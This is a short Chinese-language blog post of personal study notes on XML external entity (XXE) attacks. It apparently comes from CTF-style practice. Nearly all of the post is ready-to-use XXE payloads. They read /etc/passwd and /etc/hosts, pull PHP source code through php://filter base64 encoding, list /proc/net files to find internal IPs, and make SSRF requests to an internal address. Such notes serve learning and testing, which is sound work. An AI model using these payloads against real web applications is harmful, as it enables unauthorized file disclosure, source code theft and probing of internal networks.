XXE学习笔记

发布于 2020-11-16  1239 次阅读


随缘更新~主要记录下遇见的xxe的攻击方法

有回显的XXE

<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "file:///etc/passwd">]
>
<user><username>&name;</username><password>1</password></user>

XXE读取源码

<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.php">
 ]>
<user><username>&file;</username><password>456</password></user>

使用base64解码后得到源码

利用XXE打内网

利用xxe进行ssrf打内网,扫描一下内网ip的几个文件:/etc/hosts/proc/net/arp/proc/net/fib_trie

<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "file:///etc/hosts">]
>
<user><username>&name;</username><password>1</password></user>

用http协议访问找到的ip地址

<?xml version="1.0"?>
<!DOCTYPE dy [
<!ENTITY dy SYSTEM "http://10.159.187.11">
]>
<user><username>&dy;</username><password>123</password></user>

也可以使用php://filter读取,可以绕过回显问题

<?xml version="1.0"?>
<!DOCTYPE dy [
<!ENTITY dy SYSTEM "php://filter/read=convert.base64-encode/resource=http://10.159.187.11">
]>
<user><username>&dy;</username><password>123</password></user>


我不知将去何方,但我已在路上。
I do not know where to go, but I have been on the road.